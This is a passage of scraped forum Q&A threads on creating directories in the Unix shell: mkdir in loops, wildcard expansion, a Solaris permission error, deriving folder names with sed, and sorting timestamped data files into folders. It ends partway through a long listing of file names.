And just as a side note, mkdir has an option flag -p that can create full directory hierarchies including sub-directories, which means that you wouldn't need an outer loop mkdir:
mkdir -p "${NaMeDiR}/${k}"
Finally, as a more subjective side note, I'd suggest rethinking how you are capitalizing your variable names, because it's incredibly difficult to read for code reviewers... I think some of the other commenters already found some potential typos that could have been avoided with a better naming convention.
I am trying to take a file, modify this file by using a value from a for loop (using sed) and redirecting it to a directory that has been created during the same for loop. Original file > Make directory > process file (make changes) > redirect output to directory My problem is at making the directory with the values of my variables. read NaMeoFFiLe read startepsilonvalue NaMeDiR="${startepsilonvalue}plus10steps" mkdir "${NaMeDiR}" for ((i=$stteps; i<=$lsteps; i+=1)); do k=$(bc <<<"""scale=1; $i /10") echo $k mkdir "${NaMeDiR}/${k}" ls "${NaMeDiR}" sed -e '0,/epsilon = ./{//c\epsilon = '"$startepsilonvalue" -e '}' \ "${NaMeoFFiLe}" > "${k}_${NaMeiFFiLe}" cat "${NaMeDiR}/${k}/${k}_${NaMeoFFiLe}" & doneThe thing is that I can create the first directory, outside the for loop, but then inside the for loop it only creates the first and last directory and it won't do the changes of the sed command. The error that I get is that the file does not exist in the directory that I look for which is obvious because the directory hasn't been created. Is there anything that I am missing?
Creating directories inside a directory, from variable values, to redirect output from sed
A pattern only ever expands to existing names, and the pattern te*/test does not match any existing name. Note that te*/test is one complete pattern and that the te* part is not matched separately from /test. Since the pattern does not match (and since the nullglob and failglob shell options are not set) it is left unexpanded and given to mkdir, which complains when it can't create the subdirectory test in the directory te*. The command cd te* succeeds because the pattern te* matches the name of the existing directory test. If there had been more names that matched te*, you may have received an error from cd.
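A short illustration of the difference, using echo so nothing is created or removed:
mkdir test
echo te*/test   # prints the literal pattern te*/test - nothing matches the whole pattern yet
mkdir test/sub
echo te*/sub    # prints test/sub - now the whole pattern matches an existing name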
nathan@gentoodesktop ~/Documents $ mkdir test nathan@gentoodesktop ~/Documents $ mkdir te*/test mkdir: cannot create directory 'te*/test': No such file or directory nathan@gentoodesktop ~/Documents $ cd te* nathan@gentoodesktop ~/Documents/test $ mkdir test nathan@gentoodesktop ~/Documents/test $ ls test
Why does mkdir not work with wildcards? [duplicate]
The other group does not have write permissions in that directory. Write permissions are needed to create directory entries, such as files and subdirectories. To give the other group write permissions, as root do chmod g+w /export/home/opt
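A quick check after the change, using the same paths as above:
ls -ld /export/home/opt             # should now show drwxrwxr-x ... root other
su - builder -c "mkdir /opt/dire"   # should now succeed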
In Solaris 9 (5.9) I fail to mkdir as user builder; the user exists in the group defined as owner for that path.
bash-2.05$ groups builder
other root sys
bash-2.05$
and this is the file structure:
bash-2.05$ ls -la / | grep opt
lrwxrwxrwx 1 root other 16 Apr 14 2008 opt -> /export/home/opt
bash-2.05$
bash-2.05$ ls -la /export/home/ | grep opt
drwxr-xr-x 13 root other 512 Jan 24 11:49 opt
bash-2.05$
builder belongs to the other group, so why does it fail to mkdir in /opt?
bash-2.05$ pwd
/opt
bash-2.05$ mkdir dire
mkdir: Failed to make directory "dire"; Permission denied
bash-2.05$
Solaris 9 Fail to mkdir - no permission
If you have a file (named list) containing the following, and you wish to create a directory for each name in the file, where the directory name is just the part after ./folder?/folder_:
./folder1/folder_01_PAP_515151
./folder1/folder_04_PAP_654123
./folder2/folder_055_PAP_685413
./folder2/folder_100_PAP_132312
./folder3/folder_32_PAP_3513131
./folder3/folder_53_PAP_3213321
./folder3/folder_84_PAP_3313213
then you can do:
cat list | sed -r -e 's~[.]/folder[0-9]+/folder_~~' | xargs -I{} mkdir -p «prefix»{}
I have made it so that folder numbers are one or more digits. Leave «prefix» blank, unless you want a prefix.
If you wish to just rename the original folders/directories, keeping the original content, then you can do the following. Test with this one first, then remove the -n from rename to do it for real:
find . -type d -name "*_PAP_*" | rename -n 's~[.]/folder[0-9]+/folder_~~'
Note the search pattern is the same for rename as it is for sed. rename works on filenames, sed works on files or streams.
The options to sed:
-r use extended regular expressions (the dialect of regular expression to use).
-e The next arg is the expression (sed program).
's~[.]/folder[0-9]+/folder_~~' the expression, quoted so that the shell does not interpret it.
The expression explained: s~[.]/folder[0-9]+/folder_~~
s do a search and replace.
~ the separator character; it separates the expression into sections. You can use any character, but must use the same one each time: s~«search_for»~«replace_with»~«options», or using a different character, s@«search_for»@«replace_with»@«options».
«search_for» a regular expression:
  [.] a dot
  /folder just what it says.
  [0-9] a digit.
  + one or more of the preceding atom (the digit), so one or more digits.
  /folder_ just what it says.
«replace_with» what to replace it with, in this case nothing.
«options» in this case none; others include i (ignore case) and g (do it more than once, not just the first string found).
I have a parent folder that includes sub-folders. In every sub-folder I have folders as follows:
Parent_folder
  folder1
    folder_01_PAP_515151
    folder_02_PAPA_554651
    folder_03_PAPX_541313
    folder_04_PAP_654123
  folder2
    folder_20_PAP_413513
    folder_02_PAPD_521354
    folder_055_PAP_685413
    folder_100_PAP_132312
  folder3
    folder_11_PAPE_5313351
    folder_32_PAP_3513131
    folder_53_PAP_3213321
    folder_84_PAP_3313213
    ..
I used the following command to list all the folders and sub-folders that contain "PAP" and save the list in a text file "list.txt":
find -type d -name "*_PAP_*" > list.txt
The output was as follows:
./folder1/folder_01_PAP_515151
./folder1/folder_04_PAP_654123
./folder1/folder_20_PAP_413513
./folder2/folder_055_PAP_685413
./folder2/folder_100_PAP_132312
./folder3/folder_32_PAP_3513131
./folder3/folder_53_PAP_3213321
./folder3/folder_84_PAP_3313213
From this list, I want to create new folders, and the names of these new folders must contain the "digits_PAP" parts, e.g. "055_PAP", "32_PAP", "53_PAP", ... from the previous list. The list of newly generated folders must be:
01_PAP
04_PAP
20_PAP
055_PAP
100_PAP
32_PAP
53_PAP
84_PAP
Create folders from specific parts of lines in a text file
To simplify those directory creations, you might consider deploying the -p option to mkdir, and extending your use of "brace expansion"s like for i in {1..22} do echo mkdir -p ${elevdir}$i/0$(printf "%1d%02d" $((i/14+1)) $(((i+10)%24)))-{01..10} done mkdir -p Josef1/0111-01 Josef1/0111-02 Josef1/0111-03 ... mkdir -p Josef2/0112-01 Josef2/0112-02 Josef2/0112-03 ... mkdir -p Josef3/0113-01 Josef3/0113-02 Josef3/0113-03 ... mkdir -p Josef4/0114-01 Josef4/0114-02 Josef4/0114-03 ... mkdir -p Josef5/0115-01 Josef5/0115-02 Josef5/0115-03 ... mkdir -p Josef6/0116-01 Josef6/0116-02 Josef6/0116-03 ... mkdir -p Josef7/0117-01 Josef7/0117-02 Josef7/0117-03 ... mkdir -p Josef8/0118-01 Josef8/0118-02 Josef8/0118-03 ... mkdir -p Josef9/0119-01 Josef9/0119-02 Josef9/0119-03 ... mkdir -p Josef10/0120-01 Josef10/0120-02 Josef10/0120-03 ...The echo is a measure of precaution; remove if happy what you see. If convinced, try a similar approach to the real copying action. At least you could gather ALL cp within one single for i in {1..10}: for i in {1..10} do cp ... cp ... cp ... doneEDIT: Or, even simpler, try for i in {111..123} {200..208}; do echo mkdir -p ${elevdir}$((i-110-i/200*76))/0$i-{01..10}; done
I have a group of 1000+ files that are labeled using text and date in a folder /home/dir/dir2/oldspot with below format: File taken on 01/07/2020 at 23:08 elevation 5 is aaaaaa-bbbb-cc10dddd-L1-202007012308-05.std aaaaaa-bbbb-cc10dddd-L1-"year""month""date""hour""minute"-"elevation".stdFile taken at 02/07/2020 at 01:48 reference file is aaaaaa-bbbb-cc10dddd-L1-202007020148.refI'd like to create a bash script that can sort all the files into sub directories based on matching the time into /home/dir1/yearmonthdayhour (see above for format) and then sorted by elevation into /home/dir/yearmonthdayhour/elevation. I created one but it is not quite automated (i.e. to many mkdir and cp) All data taken on 2020070123 at elevation 05 would be would go into the subdirectory of /home/dir/2020070123/2020070123-05.std The contents of /home/dir/2020070123/2020070123-05.std would be: aaaaaa-bbbb-cc10-dddd-L1-202007012308-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-05.stdI have including seven hours worth of data here (characters limited me). The total data spans from 01/07/2020 11:31 (202007011131) to 02/07/2020 08:32 (202007020832) and has 12 files with time stamps about 12-25 minutes apart. aaaaaa-bbbb-cc10dddd-L1-202007012004-00.std aaaaaa-bbbb-cc10dddd-L1-202007012004-01.std aaaaaa-bbbb-cc10dddd-L1-202007012004-02.std aaaaaa-bbbb-cc10dddd-L1-202007012004-03.std aaaaaa-bbbb-cc10dddd-L1-202007012004-04.std aaaaaa-bbbb-cc10dddd-L1-202007012004-05.std aaaaaa-bbbb-cc10dddd-L1-202007012004-06.std aaaaaa-bbbb-cc10dddd-L1-202007012004-07.std aaaaaa-bbbb-cc10dddd-L1-202007012004-08.std aaaaaa-bbbb-cc10dddd-L1-202007012004-09.std aaaaaa-bbbb-cc10dddd-L1-202007012004-10.std aaaaaa-bbbb-cc10dddd-L1-202007012004.ref aaaaaa-bbbb-cc10dddd-L1-202007012016-00.std aaaaaa-bbbb-cc10dddd-L1-202007012016-01.std aaaaaa-bbbb-cc10dddd-L1-202007012016-02.std aaaaaa-bbbb-cc10dddd-L1-202007012016-03.std aaaaaa-bbbb-cc10dddd-L1-202007012016-04.std aaaaaa-bbbb-cc10dddd-L1-202007012016-05.std aaaaaa-bbbb-cc10dddd-L1-202007012016-06.std aaaaaa-bbbb-cc10dddd-L1-202007012016-07.std aaaaaa-bbbb-cc10dddd-L1-202007012016-08.std aaaaaa-bbbb-cc10dddd-L1-202007012016-09.std aaaaaa-bbbb-cc10dddd-L1-202007012016-10.std aaaaaa-bbbb-cc10dddd-L1-202007012016.ref aaaaaa-bbbb-cc10dddd-L1-202007012027-00.std aaaaaa-bbbb-cc10dddd-L1-202007012027-01.std aaaaaa-bbbb-cc10dddd-L1-202007012027-02.std aaaaaa-bbbb-cc10dddd-L1-202007012027-03.std aaaaaa-bbbb-cc10dddd-L1-202007012027-04.std aaaaaa-bbbb-cc10dddd-L1-202007012027-05.std aaaaaa-bbbb-cc10dddd-L1-202007012027-06.std aaaaaa-bbbb-cc10dddd-L1-202007012027-07.std aaaaaa-bbbb-cc10dddd-L1-202007012027-08.std aaaaaa-bbbb-cc10dddd-L1-202007012027-09.std aaaaaa-bbbb-cc10dddd-L1-202007012027-10.std aaaaaa-bbbb-cc10dddd-L1-202007012027.ref aaaaaa-bbbb-cc10dddd-L1-202007012039-00.std aaaaaa-bbbb-cc10dddd-L1-202007012039-01.std aaaaaa-bbbb-cc10dddd-L1-202007012039-02.std aaaaaa-bbbb-cc10dddd-L1-202007012039-03.std aaaaaa-bbbb-cc10dddd-L1-202007012039-04.std aaaaaa-bbbb-cc10dddd-L1-202007012039-05.std aaaaaa-bbbb-cc10dddd-L1-202007012039-06.std aaaaaa-bbbb-cc10dddd-L1-202007012039-07.std aaaaaa-bbbb-cc10dddd-L1-202007012039-08.std aaaaaa-bbbb-cc10dddd-L1-202007012039-09.std aaaaaa-bbbb-cc10dddd-L1-202007012039-10.std aaaaaa-bbbb-cc10dddd-L1-202007012039.ref aaaaaa-bbbb-cc10dddd-L1-202007012050-00.std aaaaaa-bbbb-cc10dddd-L1-202007012050-01.std 
aaaaaa-bbbb-cc10dddd-L1-202007012050-02.std aaaaaa-bbbb-cc10dddd-L1-202007012050-03.std aaaaaa-bbbb-cc10dddd-L1-202007012050-04.std aaaaaa-bbbb-cc10dddd-L1-202007012050-05.std aaaaaa-bbbb-cc10dddd-L1-202007012050-06.std aaaaaa-bbbb-cc10dddd-L1-202007012050-07.std aaaaaa-bbbb-cc10dddd-L1-202007012050-08.std aaaaaa-bbbb-cc10dddd-L1-202007012050-09.std aaaaaa-bbbb-cc10dddd-L1-202007012050-10.std aaaaaa-bbbb-cc10dddd-L1-202007012050.ref aaaaaa-bbbb-cc10dddd-L1-202007012102-00.std aaaaaa-bbbb-cc10dddd-L1-202007012102-01.std aaaaaa-bbbb-cc10dddd-L1-202007012102-02.std aaaaaa-bbbb-cc10dddd-L1-202007012102-03.std aaaaaa-bbbb-cc10dddd-L1-202007012102-04.std aaaaaa-bbbb-cc10dddd-L1-202007012102-05.std aaaaaa-bbbb-cc10dddd-L1-202007012102-06.std aaaaaa-bbbb-cc10dddd-L1-202007012102-07.std aaaaaa-bbbb-cc10dddd-L1-202007012102-08.std aaaaaa-bbbb-cc10dddd-L1-202007012102-09.std aaaaaa-bbbb-cc10dddd-L1-202007012102-10.std aaaaaa-bbbb-cc10dddd-L1-202007012102.ref aaaaaa-bbbb-cc10dddd-L1-202007012113-00.std aaaaaa-bbbb-cc10dddd-L1-202007012113-01.std aaaaaa-bbbb-cc10dddd-L1-202007012113-02.std aaaaaa-bbbb-cc10dddd-L1-202007012113-03.std aaaaaa-bbbb-cc10dddd-L1-202007012113-04.std aaaaaa-bbbb-cc10dddd-L1-202007012113-05.std aaaaaa-bbbb-cc10dddd-L1-202007012113-06.std aaaaaa-bbbb-cc10dddd-L1-202007012113-07.std aaaaaa-bbbb-cc10dddd-L1-202007012113-08.std aaaaaa-bbbb-cc10dddd-L1-202007012113-09.std aaaaaa-bbbb-cc10dddd-L1-202007012113-10.std aaaaaa-bbbb-cc10dddd-L1-202007012113.ref aaaaaa-bbbb-cc10dddd-L1-202007012125-00.std aaaaaa-bbbb-cc10dddd-L1-202007012125-01.std aaaaaa-bbbb-cc10dddd-L1-202007012125-02.std aaaaaa-bbbb-cc10dddd-L1-202007012125-03.std aaaaaa-bbbb-cc10dddd-L1-202007012125-04.std aaaaaa-bbbb-cc10dddd-L1-202007012125-05.std aaaaaa-bbbb-cc10dddd-L1-202007012125-06.std aaaaaa-bbbb-cc10dddd-L1-202007012125-07.std aaaaaa-bbbb-cc10dddd-L1-202007012125-08.std aaaaaa-bbbb-cc10dddd-L1-202007012125-09.std aaaaaa-bbbb-cc10dddd-L1-202007012125-10.std aaaaaa-bbbb-cc10dddd-L1-202007012125.ref aaaaaa-bbbb-cc10dddd-L1-202007012136-00.std aaaaaa-bbbb-cc10dddd-L1-202007012136-01.std aaaaaa-bbbb-cc10dddd-L1-202007012136-02.std aaaaaa-bbbb-cc10dddd-L1-202007012136-03.std aaaaaa-bbbb-cc10dddd-L1-202007012136-04.std aaaaaa-bbbb-cc10dddd-L1-202007012136-05.std aaaaaa-bbbb-cc10dddd-L1-202007012136-06.std aaaaaa-bbbb-cc10dddd-L1-202007012136-07.std aaaaaa-bbbb-cc10dddd-L1-202007012136-08.std aaaaaa-bbbb-cc10dddd-L1-202007012136-09.std aaaaaa-bbbb-cc10dddd-L1-202007012136-10.std aaaaaa-bbbb-cc10dddd-L1-202007012136.ref aaaaaa-bbbb-cc10dddd-L1-202007012148-00.std aaaaaa-bbbb-cc10dddd-L1-202007012148-01.std aaaaaa-bbbb-cc10dddd-L1-202007012148-02.std aaaaaa-bbbb-cc10dddd-L1-202007012148-03.std aaaaaa-bbbb-cc10dddd-L1-202007012148-04.std aaaaaa-bbbb-cc10dddd-L1-202007012148-05.std aaaaaa-bbbb-cc10dddd-L1-202007012148-06.std aaaaaa-bbbb-cc10dddd-L1-202007012148-07.std aaaaaa-bbbb-cc10dddd-L1-202007012148-08.std aaaaaa-bbbb-cc10dddd-L1-202007012148-09.std aaaaaa-bbbb-cc10dddd-L1-202007012148-10.std aaaaaa-bbbb-cc10dddd-L1-202007012148.ref aaaaaa-bbbb-cc10dddd-L1-202007012159-00.std aaaaaa-bbbb-cc10dddd-L1-202007012159-01.std aaaaaa-bbbb-cc10dddd-L1-202007012159-02.std aaaaaa-bbbb-cc10dddd-L1-202007012159-03.std aaaaaa-bbbb-cc10dddd-L1-202007012159-04.std aaaaaa-bbbb-cc10dddd-L1-202007012159-05.std aaaaaa-bbbb-cc10dddd-L1-202007012159-06.std aaaaaa-bbbb-cc10dddd-L1-202007012159-07.std aaaaaa-bbbb-cc10dddd-L1-202007012159-08.std aaaaaa-bbbb-cc10dddd-L1-202007012159-09.std aaaaaa-bbbb-cc10dddd-L1-202007012159-10.std 
aaaaaa-bbbb-cc10dddd-L1-202007012159.ref aaaaaa-bbbb-cc10-dddd-L1-202007012211-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012211-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012211.ref aaaaaa-bbbb-cc10-dddd-L1-202007012222-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012222-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012222.ref aaaaaa-bbbb-cc10-dddd-L1-202007012234-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012234-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012234.ref aaaaaa-bbbb-cc10-dddd-L1-202007012245-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012245-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012245.ref aaaaaa-bbbb-cc10-dddd-L1-202007012257-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012257-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012257.ref aaaaaa-bbbb-cc10-dddd-L1-202007012308-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012308-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012308.ref aaaaaa-bbbb-cc10-dddd-L1-202007012319-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-05.std 
aaaaaa-bbbb-cc10-dddd-L1-202007012319-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012319.ref aaaaaa-bbbb-cc10-dddd-L1-202007012331-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012331.ref aaaaaa-bbbb-cc10-dddd-L1-202007012342-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012342.ref aaaaaa-bbbb-cc10-dddd-L1-202007012354-00.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-01.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-02.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-03.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-04.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-06.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-07.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-08.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-09.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-10.std aaaaaa-bbbb-cc10-dddd-L1-202007012354.ref aaaaaa-bbbb-cc10-dddd-L1-202007020005-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020005-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020005.ref aaaaaa-bbbb-cc10-dddd-L1-202007020017-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020017-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020017.ref aaaaaa-bbbb-cc10-dddd-L1-202007020028-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020028-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020028.ref aaaaaa-bbbb-cc10-dddd-L1-202007020040-00.std 
aaaaaa-bbbb-cc10-dddd-L1-202007020040-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020040-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020040.ref aaaaaa-bbbb-cc10-dddd-L1-202007020051-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020051-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020051.ref aaaaaa-bbbb-cc10-dddd-L1-202007020103-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020103-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020103.ref aaaaaa-bbbb-cc10-dddd-L1-202007020114-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020114-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020114.ref aaaaaa-bbbb-cc10-dddd-L1-202007020125-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-06.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-07.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-08.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-09.std aaaaaa-bbbb-cc10-dddd-L1-202007020125-10.std aaaaaa-bbbb-cc10-dddd-L1-202007020125.ref aaaaaa-bbbb-cc10-dddd-L1-202007020137-00.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-01.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-02.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-03.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-04.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-05.std aaaaaa-bbbb-cc10-dddd-L1-202007020137-06.std 